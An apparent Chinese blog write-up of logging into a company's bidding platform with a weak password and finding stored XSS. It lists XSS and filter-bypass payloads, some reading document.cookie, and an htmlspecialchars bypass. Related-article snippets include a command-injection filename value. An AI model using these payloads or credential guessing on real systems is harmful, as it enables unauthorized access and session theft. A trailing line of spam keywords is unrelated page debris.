<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    對某公司一次弱口令到存儲型xss挖掘

    VSole2021-11-22 14:45:46

    背景:

    某次針對某目標信息搜集無意發現某工程公司的項目招標平臺

    厚碼…求生欲滿滿嗚嗚嗚

    有個供應商登陸,啥也不說先來個弱口令 123456:123456

    只能說弱口令yyds!!!!

    發現在供應商資料中存在不少輸入點,手癢隨手一波xss

    分享一波常用測試語句:

    輸入框:

    <script>alert('XSS')</script>
    <scr<script>ipt>alert('XSS')</scr<script>ipt>
    "><script>alert("XSS")</script>
    "><script>alert(String.fromCharCode(88,83,83))</script>
    

    圖片:

    <img src=x onerror=alert('XSS');>
    <img src=x onerror=alert('XSS')//
    <img src=x onerror=alert(String.fromCharCode(88,83,83));>
    <img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
    <img src=x:alert(alt) onerror=eval(src) alt=xss>
    "><img src=x οnerrοr=alert("XSS");>
    "><img src=x onerror=alert(String.fromCharCode(88,83,83));>
    

    編輯器:

    [a](javascript:window.onerror=alert;throw%201)
    [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
    [a](j a v a s c r i p t:prompt(document.cookie))
    [a](javascript:prompt(document.cookie))
    

    刷一波發現大部分都有過濾,但是[股份/責任人] 欄下有代碼被注入成功

    語句為:"<script>alert('XSS')</script>"<\

    查看該部分DOM源碼:

    有戲!

    針對該點繼續測試,構造語句:"<script>alert('XSS')</script>"<

    嘗試url編碼:

    這么一通注下來,對剛剛的亂注小總結一下:

    • 發現 / 被轉義成 =”” //
    • /變成 =””
    • </ script>轉義成<=”” script=””> 而且多個/
    • 如///也只被轉義成 =”” 沒辦法重寫繞過

    并且存在htmlspecialchars()函數: &quot,意味: “””

    本地測試發現script便簽中存在 &quot 就無法彈窗

    所以存在兩個問題,一方面要繞過這個&quot,而且要繞過的轉義

    先說對的繞過思路:

    轉換法:

    前端限制繞過,直接抓包重放,或者修改html前端代碼
    大小寫,比如:<scrIPT>alERT(1111)</scRIPT>用來繞過
    拼湊:<scri<script>pt>alert(1111)</scri</script>pt>
    使用注釋干擾:
    <scri<!--test-->pt>alert(111)</scri<!--test-->pt>
    編碼法:核心思路:后臺過濾了特殊字符,比如<script>標簽,但該標簽可以被各種編碼,后臺不一定過濾,當瀏覽器對該編碼進行識別時,會翻譯成正常的便簽,從而執行在使用編碼時需要主要編碼在輸出點是否會被正常是不和翻譯!
    

    接下來說對&quot的繞過:

    `htmlspecialchars()函數是把預定義的字符轉換為HTML實體,預定義的字符是:

    &(和號)成為 &amp

    “ (雙引號)成為&quot

    ‘(單引號)成為&#039

    <(小于號)成為&lt

    (大于號) 成為&gt
    可引用類型:
    ENT_COMPAT-默認,僅編碼雙引號
    ENT_QUOMES-編碼雙引號和單引號
    ENT_NOQUOTES-不編碼任何引號
    `

    其他函數

    構造語句:

    構造對&quot的繞過:

    q'οnclick='alert(1111)'

    直接產生彈窗:

    重新訪問頁面該xss彈窗還在,說明注入成功

    接下來就是利用xss平臺對這個注入點進行下一步利用

    具體可以參考:

    https://www.cnblogs.com/coderge/p/13701664.html

    xss常見的防范措施

    總的原則:輸入做過濾,輸出做轉義

    過濾:根據業務需求進行過濾,比如過濾要求輸入手機號,則只允許輸入手機號格式的數字

    xss弱口令
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    0x01 前言最近兩個月學著去挖洞,混了快2個月的補天,還是有挺多收獲的。我們先注冊一個個人用戶,然后登陸。然后到這里,不要以為失敗了,我們還是得對這個頁面抓包,繼續改usertype和uid,然后再次發包就可以下載了。但是這個報錯讓我知道了完整的sql語句于是想到了用萬能密碼。注入的地方在搜索框,是一個搜索型SQL注入,通常搜索型SQL注入的SQL語句都是:select * from users where id like '%xxx%' order by xxxxxxxxx";
    接口未授權在嘗是了一波js接口后沒有發現什么漏洞,但是查找到了一些信息泄露。sql注入(兩枚)在剛剛注冊了用戶,登錄進去。第一處將url和參數進行拼接。第二處第二處同樣是js文件內找到。在圖片中間的地方插入xss語句但是如果沒有找到可以注冊的api,則這個漏洞無法利用,為了擴大漏洞危害,嘗試刪除cookie,是否可以未授權文件上傳。
    求生欲滿滿嗚嗚嗚有個供應商登陸,啥也不說先來個口令 123456:123456只能說口令yyds!!!!發現在供應商資料中存在不少輸入點,手癢隨手一波xss分享一波常用測試語句:輸入框:
    信安之路文庫第?通過列出的目錄發現, image 目錄下存在一個壓縮文件:?????下載后,解壓:?????其中提到一個修改 logo 的接口,使用 burp 請求,發現接口存在并且可以訪問:?????嘗試使用瀏覽器訪問:?????可以上傳文件,那么嘗試看看能否直接上傳個 webshell,經過多次嘗試后以失敗而告終,最后測試看看文件名處是不是有一些常見的漏洞,比如 SQL 注入,XSS、RCE 等,功夫不負有心人,終于讓我發現了一個 RCE:payload 為:filename=”test||sleep 30 ||.gif”
    前言 分享兩個小思路,很久以前玩的,列如我們在生活中會遇到各種煩人的短信轟炸,怎么樣子去反制他?
    針對 Acunetix AWVS掃描器開發的批量掃描腳本,支持log4j漏洞、SpringShell、SQL注入、XSS口令等專項,支持聯動xray、burp、w13scan等被動批量
    前言記錄下某個測試項目中,通過一個文件備份泄露到主機上線的過程。習慣性將路徑拼接一下訪問一下url,好家伙,未授權。默認賬戶密碼同時注意到了配置文件中還有一行定義了默認登錄賬戶和密碼哈希。于是在cmd5對此哈希進行解密,并成功獲取賬號明文密碼。使用正確的url通過哥斯拉連接成功,GetShell達成。未授權訪問+數據查詢+xp_cmdshell=RCE在getshell之后,并未停止測試腳步,發現了一處sql查詢頁面,除了可以查詢數據庫內容外,還可以執行sql語句。
    服務器的相關信息(真實ip,系統類型,版本,開放端口,WAF等) 網站指紋識別(包括,cms,cdn,證書等),dns記錄 whois信息,姓名,備案,郵箱,電話反查(郵箱丟社工庫,社工準備等) 子域名收集,旁站,C段等 google hacking針對化搜索,pdf文件,中間件版本,口令掃描等 掃描網站目錄結構,爆后臺,網站banner,測試文件,備份等敏感文件泄漏等 傳輸協議,通用漏洞,ex
    只要功夫深,鐵杵磨成針!
    Scanners-Box 指引#簡介#Scanners-Box是一個集合github平臺上的安全行業從業人員自研開源掃描器的倉庫,包括子域名枚舉、數據庫漏洞掃描、口令或信息泄漏掃描、端口掃描、指紋識別以及其他大型掃描器或模塊化掃描器;該倉庫只收錄各位網友自己編寫的一般性開源掃描器,類似nmap、w3af、brakeman等知名掃描工具不收錄。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类